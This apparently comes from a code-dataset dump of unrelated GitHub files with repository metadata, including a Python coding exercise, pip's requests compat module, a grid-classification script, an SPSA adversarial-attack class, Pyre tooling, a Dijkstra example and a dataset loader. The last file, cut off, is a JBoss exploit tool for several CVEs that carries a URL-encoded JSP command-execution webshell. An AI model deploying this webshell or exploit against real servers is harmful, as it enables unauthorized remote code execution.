for key, value in num_dict.items():
answer = answer.replace(key, value) #TypeError: replace() argument 2 must be str, not
int
return int(answer)
"""
#틀린 이유: TypeError: replace() argument 2 must be str, not int
"""num_dict = {"zero":"0", "one":"1", "two":"2", "three":"3", "four":"4", "five":"5", "six":"6", "seven":"7", "eight":"8", "nine":"9"}
def solution(s):
answer = s #??
for key, value in num_dict.items():
answer = answer.replace(key, value)
#print(int(answer)) 1478 234567 234567 123
return int(answer)
solution('one4seveneight')
solution('23four5six7')
solution('2three45sixseven')
solution('123')"""
| [
"[email protected]"
] | |
16c933dacc6329ecefdc1061f3773c0e6384b462 | 7d2f933ed3c54e128ecaec3a771817c4260a8458 | /venv/Lib/site-packages/pip/_vendor/requests/compat.py | f567d706cd0d1dc57b89d2eeb78b0a4b4b0bc943 | [] | no_license | danielmoreira12/BAProject | c61dfb1d0521eb5a28eef9531a00e744bfb0e26a | 859f588305d826a35cc8f7d64c432f54a0a2e031 | refs/heads/master | 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,940 | py | # -*- coding: utf-8 -*-
"""
requests.compat
~~~~~~~~~~~~~~~
This module handles import compatibility issues between Python 2 and
Python 3.
"""
import sys
from pip._vendor import chardet
# -------
# Pythons
# -------
# Syntax sugar.
_ver = sys.version_info
#: Python 2.x?
is_py2 = (_ver[0] == 2)
#: Python 3.x?
is_py3 = (_ver[0] == 3)
# Note: We've patched out simplejson support in pip because it prevents
# upgrading simplejson on Windows.
# try:
# import simplejson as json
# except (ImportError, SyntaxError):
# # simplejson does not support Python 3.2, it throws a SyntaxError
# # because of u'...' Unicode literals.
import json
# ---------
# Specifics
# ---------
if is_py2:
from urllib import (
quote, unquote, quote_plus, unquote_plus, urlencode, getproxies,
proxy_bypass, proxy_bypass_environment, getproxies_environment)
from urlparse import urlparse, urlunparse, urljoin, urlsplit, urldefrag
from urllib2 import parse_http_list
import cookielib
from Cookie import Morsel
from StringIO import StringIO
from collections import Callable, Mapping, MutableMapping, OrderedDict
builtin_str = str
bytes = str
str = unicode
basestring = basestring
numeric_types = (int, long, float)
integer_types = (int, long)
elif is_py3:
from urllib.parse import urlparse, urlunparse, urljoin, urlsplit, urlencode, quote, unquote, quote_plus, unquote_plus, urldefrag
from urllib.request import parse_http_list, getproxies, proxy_bypass, proxy_bypass_environment, getproxies_environment
from http import cookiejar as cookielib
from http.cookies import Morsel
from io import StringIO
from collections import OrderedDict
from collections.abc import Callable, Mapping, MutableMapping
builtin_str = str
str = str
bytes = bytes
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
| [
"[email protected]"
] | |
1d42cbd09fcf99997ea91a42c32d8fd54beb97a5 | c874cc40a903295b33893d2750b6caf373386e6f | /grid_equiv_classes.py | 9453a6843898226e986dcf18cf09ab64d3a78da6 | [] | no_license | runbobby/Item-Matching-Game | 6cbf99923b05987dc2aa50dd0ea2560c9e62625e | 21606a9058190c17ad21d9b4b4e04943ae8e84a8 | refs/heads/master | 2021-01-19T11:40:08.544928 | 2017-04-12T00:27:51 | 2017-04-12T00:27:51 | 87,986,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,555 | py | import numpy as np
%cd
%cd Documents\item_matching\data
import json
# warning!!!!!!!!!!!!!!!!!
# this code uses integer division twice
# may need to rewrite code depending on environment
# parameters
# u = # unsolved slots, o = # orange items; o <= u
# y = # yellow
# also y + u <= max_s, in this case, 5
# possible grids. we want to find isomorphism classes of grids
# the integer i corresponds to a grid as follows:
# i = i_{uo-1} i_{uo-2} ... i_1 i_0 in binary
# digit 0 means "known incorrect." digit 1 means "no info"
# example
# slot0, slot1, slot2, slot3
# item1 i_0 i_1 i_2 i_3
# item2 i_4 i_5 i_6 i_7
# item3 i_8 i_9 i_10 i_11
# NEW!!!!!!!!!!!!!!!!!!!!!!!!!!
# now, a grid has the form(u,
for u in range(0, 6):
for o in range(0, u + 1):
for y in range(0, 6 - u):
grid_classes(u, o, y)
print (u, o, y)
def grid_classes(u, o, y):
N = pow(2, u * (o + y))
oy = o + y
nss = [0] * max(0, u-1)
nsi = [0] * max(0, o-1)
nsy = [0] * max(0, y-1)
for a in range(len(nss)):
nss[a] = [-1] * N
for a in range(len(nsi)):
nsi[a] = [-1] * N
for a in range(len(nsy)):
nsy[a] = [-1] * N
# compute transposes as in old, but replace o in old with o+y
transpose = [0]*N
transpose2 = [0]*N
adjustment = [0] * (u * (o + y))
adj = 0
k = 0
for j in range(o + y):
for i in range(u):
adjustment[k] = adj + pow(2, i * (o + y) + j)
adj -= pow(2, i * (o + y) + j)
k += 1
j = 0
for i in range(N):
transpose[i] = j
transpose2[j] = i
# j += 1
# a = number of powers of 2 dividing i+1
a = 0
b = i+1
while b%2 == 0:
a += 1
b /= 2
if a == u * (o + y): break
# if a = 0, we do j+= 1. otherwise, we need to add something tricky
j += adjustment[a]
# populate nss
p2o = pow(2, o + y)
for a in range(u-1):
# print nss[a]
p2ao = pow(2, a*(o + y))
place_value = pow(2, (1+a)*(o + y))
grid = 0
for i in range(p2o):
# print(a, i)
for j in range(pow(2, (o + y)*(u-1))):
# grid += 1
grid = i + p2o * j
# print (a, i, j, transpose2[grid], nss[a][transpose2[grid]])
if nss[a][transpose2[grid]] != -1: continue
r = (j // p2ao) % p2o
neighbor = grid + (r - i) + (i - r)*place_value
# print a, transpose2[grid], transpose2[neighbor]
nss[a][transpose2[grid]] = transpose2[neighbor]
nss[a][transpose2[neighbor]] = transpose2[grid]
# populate nsi
p2u = pow(2, u)
for a in range(o-1):
# populate nsi[a]
place_value = pow(2, (1+a)*u)
p2au = pow(2, a*u)
grid = 0
for i in range(p2u):
for j in range(pow(2, u*(o + y - 1))):
# grid += 1
grid = i + p2u * j
if nsi[a][grid] != -1: continue
# r = row to be switched; it's ablock of j in binary
r = (j // p2au) % p2u
# neighbor is formed by switching two digits in base p2u
# namely the ones digit and the (p2u)^(a+1)'s place
neighbor = grid + (r - i) + (i - r)*place_value
nsi[a][grid] = neighbor
nsi[a][neighbor] = grid
# populate nsy
C = pow(2, u * (1 + o))
p2ou = pow(2, u * o)
for a in range(y - 1):
place_value = pow(2, (1 + o + a)*u)
D = pow(2, u * (a + o))
p2au = pow(2, a * u)
grid = 0
for i in range(C):
ii = i // p2ou
for j in range(pow(2, u * (y - 1))):
grid = i + C * j
if nsy[a][grid] != -1: continue
r = (j // p2au) % p2u
neighbor = grid + (r - ii) * p2ou + (ii - r) * place_value
nsy[a][grid] = neighbor
nsy[a][neighbor] = grid
# dfs traversal
visited = [False] * N
vv = 0
Class = [-1] * N
while vv < N:
while vv < N and visited[vv]:
vv += 1
if vv == N: break
vertex = vv
visited[vertex] = True
# vertex is the lowest representative in its isomorphism class
Class[vertex] = vertex
v_not_visited = [True] * N
v_not_visited[vertex] = False
in_v_component = [vertex]
ivc_index = 0
while ivc_index < len(in_v_component):
x = in_v_component[ivc_index]
for a in range(o-1):
w = nsi[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(u-1):
w = nss[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(y-1):
w = nsy[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
ivc_index += 1
reprs = []
for i in range(N):
if Class[i] == i:
reprs.append(i)
###############################################################################
# next: for each representative, determine if there exist valid assignments or not
# a grid is valid iff there is a valid injective map from items -> slots; digits are 1
# method: hall's lemma?
# return 0 if invalid
# return 1 if valid, but needs gray items
# return 2 if valid without gray items
def is_valid(grid):
# g_bin = grid in binary as an array
# g_bin[item][slot]
# gg = only the u x o grid, or the orange items
gg = grid % pow(2, o * u)
g_bin = [0]*o
for a in range(o):
g_bin[a] = [0]*u
for item in range(o):
for slot in range(u):
g_bin[item][slot] = gg % 2
gg = gg // 2
violating_subset = False
for i in range(pow(2, o)):
# a = num ones in i in binary
# i_bin = i in binary; i[d] = 2^d place
i_bin = [0]*o
b_index = 0
a = 0
ii = i
while ii > 0:
if ii % 2 == 1:
a += 1
i_bin[b_index] = 1
ii = ii // 2
b_index += 1
# count of # slots available for the subset i
# recall that by Hall's theorem, this should be >= a
c = 0
for slot in range(u):
for item in range(o):
if i_bin[item] == 1 and g_bin[item][slot] == 1:
c+= 1
break
if c < a:
violating_subset = True
break
if violating_subset:
return 0
# now we need to deal with yellow items. by now, we assume that the orange grid is
# valid wrt. Hall's lemma
# lemma: an orange/yellow grid is exactly 1-valid if there exists a column (out of u)
# such that all orange/yellow items are forbidden from it
# if there exists no such column, then the orange/yellow grid is 2-valid
gg = grid
rows = []
for i in range(o + y):
rows.append(gg % pow(2, u))
gg = gg // pow(2, u)
empty_columns = [True] * u
for i in range(u):
for j in range(o + y):
if rows[j] % 2 == 1:
empty_columns[i] = False
rows[j] = rows[j] // 2
if sum(empty_columns) > 0:
return 1
else:
return 2
valid_reprs = []
number_1_valid = 0
for r in reprs:
if is_valid(r)== 1:
valid_reprs.append(r)
number_1_valid += 1
for r in reprs:
if is_valid(r) == 2:
valid_reprs.append(r)
valid_reprs.append(number_1_valid)
# now, the last term of valid_reprs is the number of one-valid reprs.
dict_vr_to_i = {}
for i in range(len(reprs)):
dict_vr_to_i[reprs[i]] = -1
for i in range(len(valid_reprs) - 1): # don't incluce the last term
dict_vr_to_i[valid_reprs[i]] = i
# rewrite Class so that it points to the representative's index, not the representative
# (smaller numbers)
for i in range(len(Class)):
Class[i] = dict_vr_to_i[Class[i]]
f = open('class'+str(u)+str(o)+str(y)+'.txt', 'w')
json.dump(Class, f)
f.close()
f = open('vr'+str(u)+str(o)+str(y)+'.txt', 'w')
json.dump(valid_reprs, f)
f.close()
# compute isomorphism classes of grids with u unsolved slots and o orange items
# compute which classes are valid
# store one representative of each valid class in
# Documents\item_matching\vr+str(u)+str(o)+.txt
# store map from all grids -> valid representative (or -1 if invalid)
# in Documents\item_matching\class+str(u)+str(o)+.txt
# estimated time. grid_classes(5, 5): 30 min?
# others are < 2 min
def grid_classes_old(u, o):
N = pow(2, u*o)
# need to make array objects different, so nss = [[0]*N]*(u-1) doesn't work
nss = [0]*(u-1)
nsi = [0]*(o-1)
for a in range(u-1):
nss[a] = [-1]*N
for a in range(o-1):
nsi[a] = [-1] * N
transpose = [0]*N
transpose2 = [0]*N
adjustment = [0] * (u * o)
adj = 0
k = 0
for j in range(o):
for i in range(u):
adjustment[k] = adj + pow(2, i * o + j)
adj -= pow(2, i * o + j)
k += 1
j = 0
for i in range(N):
transpose[i] = j
transpose2[j] = i
# j += 1
# a = number of powers of 2 dividing i+1
a = 0
b = i+1
while b%2 == 0:
a += 1
b /= 2
if a == u*o: break
# if a = 0, we do j+= 1. otherwise, we need to add something tricky
j += adjustment[a]
# populate nsi
p2u = pow(2, u)
for a in range(o-1):
# populate nsi[a]
place_value = pow(2, (1+a)*u)
p2au = pow(2, a*u)
grid = 0
for i in range(p2u):
for j in range(pow(2, u*(o-1))):
# grid += 1
grid = i + p2u * j
if nsi[a][grid] != -1: continue
# r = row to be switched; it's ablock of j in binary
r = (j // p2au) % p2u
# neighbor is formed by switching two digits in base p2u
# namely the ones digit and the (p2u)^(a+1)'s place
neighbor = grid + (r - i) + (i - r)*place_value
nsi[a][grid] = neighbor
nsi[a][neighbor] = grid
# populate nss
p2o = pow(2, o)
for a in range(u-1):
# print nss[a]
p2ao = pow(2, a*o)
place_value = pow(2, (1+a)*o)
grid = 0
for i in range(p2o):
# print(a, i)
for j in range(pow(2, o*(u-1))):
# grid += 1
grid = i + p2o * j
# print (a, i, j, transpose2[grid], nss[a][transpose2[grid]])
if nss[a][transpose2[grid]] != -1: continue
r = (j // p2ao) % p2o
neighbor = grid + (r - i) + (i - r)*place_value
# print a, transpose2[grid], transpose2[neighbor]
nss[a][transpose2[grid]] = transpose2[neighbor]
nss[a][transpose2[neighbor]] = transpose2[grid]
# dfs traversal
visited = [False] * N
vv = 0
Class = [-1] * N
while vv < N:
while vv < N and visited[vv]:
vv += 1
if vv == N: break
vertex = vv
visited[vertex] = True
# vertex is the lowest representative in its isomorphism class
Class[vertex] = vertex
v_not_visited = [True] * N
v_not_visited[vertex] = False
in_v_component = [vertex]
ivc_index = 0
while ivc_index < len(in_v_component):
x = in_v_component[ivc_index]
for a in range(o-1):
w = nsi[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
for a in range(u-1):
w = nss[a][x]
if v_not_visited[w]:
in_v_component.append(w)
v_not_visited[w] = False
visited[w] = True
Class[w] = vertex
ivc_index += 1
# determine unique representatives
# uses fact that representatives are exactly the i for which Class[i] == i
reprs = []
for i in range(N):
if Class[i] == i:
reprs.append(i)
###############################################################################
# next: for each representative, determine if there exist valid assignments or not
# a grid is valid iff there is a valid injective map from items -> slots; digits are 1
# method: hall's lemma?
def is_valid(grid):
# g_bin = grid in binary as an array
# g_bin[item][slot]
gg = grid
g_bin = [0]*o
for a in range(o):
g_bin[a] = [0]*u
for item in range(o):
for slot in range(u):
g_bin[item][slot] = gg % 2
gg = gg // 2
violating_subset = False
for i in range(pow(2, o)):
# a = num ones in i in binary
# i_bin = i in binary; i[d] = 2^d place
i_bin = [0]*o
b_index = 0
a = 0
ii = i
while ii > 0:
if ii % 2 == 1:
a += 1
i_bin[b_index] = 1
ii = ii // 2
b_index += 1
# count of # slots available for the subset i
# recall that by Hall's theorem, this should be >= a
c = 0
for slot in range(u):
for item in range(o):
if i_bin[item] == 1 and g_bin[item][slot] == 1:
c+= 1
break
if c < a:
violating_subset = True
break
return not(violating_subset)
valid_reprs = []
for r in reprs:
if is_valid(r):
valid_reprs.append(r)
dict_vr_to_i = {}
for i in range(len(reprs)):
dict_vr_to_i[reprs[i]] = -1
for i in range(len(valid_reprs)):
dict_vr_to_i[valid_reprs[i]] = i
# rewrite Class so that it points to the representative's index, not the representative
# (smaller numbers)
for i in range(len(Class)):
Class[i] = dict_vr_to_i[Class[i]]
f = open('class'+str(u)+str(o)+'.txt', 'w')
json.dump(Class, f)
#for i in range(len(Class)):
# f.write(str(Class[i]) + " ")
f.close()
f = open('vr'+str(u)+str(o)+'.txt', 'w')
json.dump(valid_reprs, f)
#for i in range(len(valid_reprs)):
# f.write(str(valid_reprs[i]) + " ")
f.close()
| [
"[email protected]"
] | |
a0f2a687b6f6f2ad88f7d90e2dd1424c4a8010f5 | 6df7c81b013305b11aa3f678b4ccb64506a31e59 | /attacker/attacks/spsa.py | 008bb4e864fbd3e3d4bbb445aeb4637418c4791b | [] | no_license | KaihuaTang/CiiV-Adversarial-Robustness.pytorch | a79ae9ec20fe66ccfd6557f1ed0f073a4d6b4076 | 4a18df048240e841ca77c1701fecbf5a4ee49fb3 | refs/heads/main | 2023-07-30T23:18:37.994775 | 2021-10-06T05:54:33 | 2021-10-06T05:54:33 | 377,840,412 | 13 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,331 | py | ##############################################################################
# Modified from https://github.com/BorealisAI/advertorch/
##############################################################################
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from ..attacker import Attacker
import utils.general_utils as utils
class SPSA(Attacker):
r"""
SPSA in the paper 'Adversarial Risk and the Dangers of Evaluating Against Weak Attacks'
[https://arxiv.org/abs/1802.05666]
"""
def __init__(self, model, logger, config, delta=0.1, eps=16, batch_size=128, steps=5, lr=0.01):
super(SPSA, self).__init__("SPSA", model, logger, config)
self.batch_size = batch_size
self.delta = delta
self.eps = eps / 255.0
self.steps = steps
self.lr = lr
logger.info('Create Attacker SPSA with delta: {}, eps: {}, steps: {}, lr: {}, batch_size: {}'.format(delta, eps, steps, lr, batch_size))
def forward(self, images, labels, random_start=False, targeted=False):
images, labels = images.cuda(), labels.cuda()
dx = torch.zeros_like(images)
dx.grad = torch.zeros_like(dx)
optimizer = optim.Adam([dx], lr=self.lr)
for _ in range(self.steps):
optimizer.zero_grad()
dx.grad = self.spsa_grad(images + dx, labels)
optimizer.step()
adv_images = torch.clamp(images + dx , min=0, max=1)
dx = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)
adv_images = images + dx
return adv_images
def f(self, x, y):
pred = self.model(x)
if isinstance(pred, tuple):
pred = pred[0]
return F.cross_entropy(pred, y)
def spsa_grad(self, x, y):
b, c, w, h = x.shape
x = x.unsqueeze(0)
y = y.unsqueeze(0)
x = x.repeat(self.batch_size, 1, 1, 1, 1).contiguous().view(self.batch_size*b,c,w,h)
y = y.repeat(self.batch_size, 1).contiguous().view(-1)
v = torch.zeros_like(x).bernoulli_().mul_(2.0).sub_(1.0)
df = self.f(x + self.delta * v, y) - self.f(x - self.delta * v, y)
grad = df / (2. * self.delta * v)
grad = grad.view(self.batch_size,b,c,w,h).mean(dim=0)
return grad | [
"[email protected]"
] | |
a9721dd19e6e401f81976ca0aab05f6e3589dc70 | a2b20597759990445081057d35d113434cfcf970 | /client/commands/report_any_expressions.py | 5d59244a817f4ddf25911ab884d7403f398a83ef | [
"MIT"
] | permissive | facebook/pyre-check | 34059599c02b65605c574f13555229f3b931fd4e | fe8ccedc572cc1faa1fd01e9138f65e982875002 | refs/heads/main | 2023-09-03T19:10:11.587028 | 2023-09-02T07:40:35 | 2023-09-02T07:40:35 | 110,274,488 | 6,703 | 575 | MIT | 2023-09-13T17:02:32 | 2017-11-10T17:31:36 | OCaml | UTF-8 | Python | false | false | 6,206 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
This module provides the entrypoint for `pyre report-any-expressions`, a command
to collect data about how often the Pyre type check for an expression will have
a safety gap
There are two main causes of safety gaps:
- `Any` appearing in the inferred type for the expression itself, e.g.
due to a missing return type on some function we called.
- The expression being passed to a function whose parameters lack annotations.
"""
from __future__ import annotations
import dataclasses
import json
import logging
import tempfile
from pathlib import Path
from typing import List, Optional, Sequence, Union
from .. import (
coverage_data,
daemon_socket,
dataclasses_json_extensions as json_mixins,
frontend_configuration,
identifiers,
log,
)
from . import commands, daemon_query, expression_level_coverage, query_response
LOG: logging.Logger = logging.getLogger(__name__)
def relative_path(
backend_absolute_path: str,
root_path: Path,
) -> str:
return str(Path(backend_absolute_path).relative_to(root_path))
@dataclasses.dataclass(frozen=True)
class AnyExpression(json_mixins.SnakeCaseAndExcludeJsonMixin):
expression_type: str
reasons: List[str]
root_cause_function_name: Optional[str]
location: coverage_data.Location
@staticmethod
def from_typed_backend_data(
data: expression_level_coverage.CoverageGap,
) -> AnyExpression:
return AnyExpression(
expression_type=data.type_,
reasons=data.reason,
root_cause_function_name=data.function_name,
location=coverage_data.Location(
start_line=data.location.start.line,
start_column=data.location.start.column,
end_line=data.location.stop.line,
end_column=data.location.stop.column,
),
)
@dataclasses.dataclass(frozen=True)
class ExpressionStatistics(json_mixins.SnakeCaseAndExcludeJsonMixin):
any_expression_count: int
total_expression_count: int
# Records cases where the backend couldn't process the module.
error: Optional[str] = None
@staticmethod
def from_error(
error: str,
) -> ExpressionStatistics:
return ExpressionStatistics(
any_expression_count=0,
total_expression_count=0,
error=error,
)
@staticmethod
def from_coverage_at_path(
coverage_at_path: expression_level_coverage.CoverageAtPath,
) -> ExpressionStatistics:
return ExpressionStatistics(
any_expression_count=len(coverage_at_path.coverage_gaps),
total_expression_count=coverage_at_path.total_expressions,
)
@dataclasses.dataclass(frozen=True)
class ModuleExpressionData(json_mixins.SnakeCaseAndExcludeJsonMixin):
path: str
expression_statistics: ExpressionStatistics
any_expressions: List[AnyExpression]
@staticmethod
def from_typed_backend_data(
data: Union[
expression_level_coverage.CoverageAtPathResponse,
expression_level_coverage.ErrorAtPathResponse,
],
root_path: Path,
) -> ModuleExpressionData:
if isinstance(data, expression_level_coverage.CoverageAtPathResponse):
coverage_at_path = data.CoverageAtPath
return ModuleExpressionData(
path=relative_path(coverage_at_path.path, root_path),
any_expressions=[
AnyExpression.from_typed_backend_data(coverage_gap)
for coverage_gap in coverage_at_path.coverage_gaps
],
expression_statistics=ExpressionStatistics.from_coverage_at_path(
coverage_at_path
),
)
else:
error_at_path = data.ErrorAtPath
return ModuleExpressionData(
path=relative_path(error_at_path.path, root_path),
any_expressions=[],
expression_statistics=ExpressionStatistics.from_error(
error_at_path.error
),
)
def get_module_paths(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> List[Path]:
if paths is None:
paths = [
configuration.get_local_root() or configuration.get_global_root(),
]
return list(
coverage_data.find_module_paths(
paths=paths,
excludes=configuration.get_excludes(),
)
)
def print_data_as_json(data: Sequence[ModuleExpressionData]) -> None:
raw_data = [module_data.to_dict() for module_data in data]
json.dump(raw_data, log.stdout)
def query_backend(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> query_response.Response:
socket_path = daemon_socket.get_socket_path(
configuration.get_project_identifier(),
flavor=identifiers.PyreFlavor.CLASSIC,
)
module_paths = get_module_paths(
configuration=configuration,
paths=paths,
)
with tempfile.NamedTemporaryFile("w") as paths_file:
paths_file.write("\n".join(str(path) for path in module_paths))
paths_file.flush()
query_string = f'expression_level_coverage("@{paths_file.name}")'
return daemon_query.execute_query(socket_path, query_string)
def run(
configuration: frontend_configuration.Base,
paths: Optional[List[Path]],
) -> int:
raw_response = query_backend(
configuration=configuration,
paths=paths,
)
typed_response = expression_level_coverage._make_expression_level_coverage_response(
raw_response.payload
)
project_root = configuration.get_local_root() or configuration.get_global_root()
report = [
ModuleExpressionData.from_typed_backend_data(
path_response,
project_root,
)
for path_response in typed_response.response
]
print_data_as_json(report)
return commands.ExitCode.SUCCESS
| [
"[email protected]"
] | |
2097ee39581794e41f8318e3dc39f25ae2c0e9b5 | 2d6481f60585fed286aeddf704b9052a33c63fb3 | /Graph Implementations and Traversals/ShortestPath.py | 86d3f2cb943bef8ebbd7e2699bbd1bb1ea33b50f | [] | no_license | BALAJISB97/DS | f8cc229f05a7c9d763f2aa888a955da6c7b3936e | e38b2957893016077bf80a3b89d0ce6b3b094fe8 | refs/heads/master | 2022-12-31T09:13:05.540389 | 2020-10-16T07:13:04 | 2020-10-16T07:13:04 | 292,648,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,091 | py | import sys
# Function to find out which of the unvisited node
# needs to be visited next
def to_be_visited():
global visited_and_distance
v = -10
# Choosing the vertex with the minimum distance
for index in range(number_of_vertices):
if visited_and_distance[index][0] == 0 \
and (v < 0 or visited_and_distance[index][1] <= \
visited_and_distance[v][1]):
v = index
return v
# Creating the graph as an adjacency matrix
vertices = [[0, 1, 1, 0],
[0, 0, 1, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]]
edges = [[0, 3, 4, 0],
[0, 0, 0.5, 0],
[0, 0, 0, 1],
[0, 0, 0, 0]]
number_of_vertices = len(vertices[0])
# The first element of the lists inside visited_and_distance
# denotes if the vertex has been visited.
# The second element of the lists inside the visited_and_distance
# denotes the distance from the source.
visited_and_distance = [[0, 0]]
for i in range(number_of_vertices-1):
visited_and_distance.append([0, sys.maxsize])
for vertex in range(number_of_vertices):
# Finding the next vertex to be visited.
to_visit = to_be_visited()
for neighbor_index in range(number_of_vertices):
# Calculating the new distance for all unvisited neighbours
# of the chosen vertex.
if vertices[to_visit][neighbor_index] == 1 and \
visited_and_distance[neighbor_index][0] == 0:
new_distance = visited_and_distance[to_visit][1] \
+ edges[to_visit][neighbor_index]
# Updating the distance of the neighbor if its current distance
# is greater than the distance that has just been calculated
if visited_and_distance[neighbor_index][1] > new_distance:
visited_and_distance[neighbor_index][1] = new_distance
# Visiting the vertex found earlier
visited_and_distance[to_visit][0] = 1
i = 0
# Printing out the shortest distance from the source to each vertex
for distance in visited_and_distance:
print("The shortest distance of ",chr(ord('a') + i),\
" from the source vertex a is:",distance[1])
i = i + 1
print(visited_and_distance)
| [
"[email protected]"
] | |
57cb4fe33919d21f7c278b6720c3360ce5e07c75 | 034be882d639a0b2031dca96bbba4b7cec5195f1 | /maskrcnn_benchmark/data/datasets/sidewalk.py | 84d5b36dd0a54e6488d716ce9aafbf6b55c4db0c | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | droseger/maskrcnn-benchmark | 3be529cd75ed571441866408839c0e7b38b653cd | 443568587671e07fa0b55b7e6d17e8e23561c75f | refs/heads/master | 2020-05-04T17:43:02.866844 | 2019-10-07T15:25:08 | 2019-10-07T15:35:50 | 179,323,384 | 0 | 0 | null | 2019-04-03T15:56:36 | 2019-04-03T15:56:36 | null | UTF-8 | Python | false | false | 1,717 | py | import torch
from torchvision.datasets import CocoDetection
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.structures.segmentation_mask import SegmentationMask
class Sidewalk(CocoDetection):
def __init__(self, ann_file, root, transforms=None):
super(Sidewalk, self).__init__(root, ann_file)
self.json_category_id_to_contiguous_id = {
v: i + 1 for i, v in enumerate(self.coco.getCatIds())
}
self.contiguous_category_id_to_json_id = {
v: k for k, v in self.json_category_id_to_contiguous_id.items()
}
self.id_to_img_map = {k: v for k, v in enumerate(self.ids)}
self.transforms = transforms
def __getitem__(self, index):
img, anno = super(Sidewalk, self).__getitem__(index)
boxes = [obj["bbox"] for obj in anno]
boxes = torch.as_tensor(boxes).reshape(-1, 4) # guard against no boxes
target = BoxList(boxes, img.size, mode="xywh").convert("xyxy")
classes = [obj["category_id"] for obj in anno]
classes = [self.json_category_id_to_contiguous_id[c] for c in classes]
classes = torch.tensor(classes)
target.add_field("labels", classes)
masks = [obj["segmentation"] for obj in anno]
masks = SegmentationMask(masks, img.size)
target.add_field("masks", masks)
target = target.clip_to_image(remove_empty=True)
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target, index
def get_img_info(self, index):
img_id = self.id_to_img_map[index]
img_data = self.coco.imgs[img_id]
return img_data
| [
"[email protected]"
] | |
4eb72862e3cb96142bcd9b864909095541319d17 | 456fe56ad14e576228654d587ee63dfe1903c87d | /EXP/RedHatJBoss.py | a1807d97591b19f6810fa90713245d985834657a | [] | no_license | kk98kk0/CodeTest | 4270612e2501fc22d35bb0764736b2c8ac2fd87b | e870925ac1405a858efd658b20b071e6b8e388d4 | refs/heads/master | 2023-02-25T12:51:03.784923 | 2021-01-25T07:54:11 | 2021-01-25T07:54:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,055 | py | import random,string,requests,http.client,time
from requests_toolbelt.utils import dump
import urllib.parse
from ClassCongregation import _urlparse
from urllib.parse import urlencode
from urllib.parse import urlparse, quote
from lxml import html
import CodeTest
################
##--RedHatJBoss--##
#cve_2010_0738
#cve_2010_1428
#cve_2015_7501
################
#CMD = echo VuLnEcHoPoCSuCCeSS
#CodeTest.VULN = None => 漏洞测试
#CodeTest.VULN = True => 命令执行
#提前设置环境变量
CodeTest.VULN = None
TIMEOUT = 10
class RedHatJBoss():
def __init__(self, url, CMD):
self.url = url
self.CMD = CMD
self.name = ''.join(random.choices(string.ascii_letters+string.digits, k=8))
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
if r"https" in self.url:
self.conn = http.client.HTTPSConnection(self.hostname, self.port)
else:
self.conn = http.client.HTTPConnection(self.hostname, self.port)
self.headers = {
"Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'
}
self.jsp_webshell = ("%3c%25%40%20%70%61%67%65%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%22%20%69%6d%70"
"%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%20%70%61%67%65%45%6e"
"%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%25%3e%3c%25%21%70%75%62%6c%69%63%20%73%74%61%74%69%63%20%53"
"%74%72%69%6e%67%20%65%78%63%75%74%65%43%6d%64%28%53%74%72%69%6e%67%20%63%29%20%7b%53%74%72%69%6e%67%42"
"%75%69%6c%64%65%72%20%6c%69%6e%65%20%3d%20%6e%65%77%20%53%74%72%69%6e%67%42%75%69%6c%64%65%72%28%29%3b"
"%74%72%79%20%7b%50%72%6f%63%65%73%73%20%70%72%6f%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74"
"%69%6d%65%28%29%2e%65%78%65%63%28%63%29%3b%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%75%66%20%3d"
"%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61"
"%6d%52%65%61%64%65%72%28%70%72%6f%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%53%74%72"
"%69%6e%67%20%74%65%6d%70%20%3d%20%6e%75%6c%6c%3b%77%68%69%6c%65%20%28%28%74%65%6d%70%20%3d%20%62%75%66"
"%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%6c%69%6e%65%2e%61%70%70%65%6e%64"
"%28%74%65%6d%70%2b%22%5c%5c%6e%22%29%3b%7d%62%75%66%2e%63%6c%6f%73%65%28%29%3b%7d%20%63%61%74%63%68%20"
